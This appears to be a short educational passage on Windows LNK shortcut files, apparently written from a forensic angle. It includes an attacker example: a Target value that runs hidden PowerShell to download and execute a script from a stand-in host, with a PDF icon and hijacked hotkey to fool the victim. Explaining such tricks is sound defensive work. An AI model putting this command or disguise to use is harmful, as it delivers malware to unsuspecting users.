LNK files are Windows shortcuts that point to files, folders, or executables. They’re created automatically (like for recent documents) or manually by users—and are often abused by attackers for Initial Access or Persistence.

Four Key Fields in the Shortcut Tab

image.png

  1. Target
  2. Shortcut key
  3. Run
  4. Change Icon

Quick Attacker Example

image.png

A single .lnk embedding all four tricks:

Field Value
Target C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('<http://evil/payload.ps1>')"
HotKey Ctrl + Z
Run Minimized
Icon C:\\Program Files\\Adobe\\Reader\\AcroRd32.exe,0 (PDF icon)

When the victim presses Ctrl +Z (or double-clicks the shortcut), Explorer launches PowerShell in a hidden/minimized window, which then fetches and executes the malicious script from the attacker’s server—while the PDF icon and familiar hotkey keep the user unsuspecting.


Forensic Value of LNK Files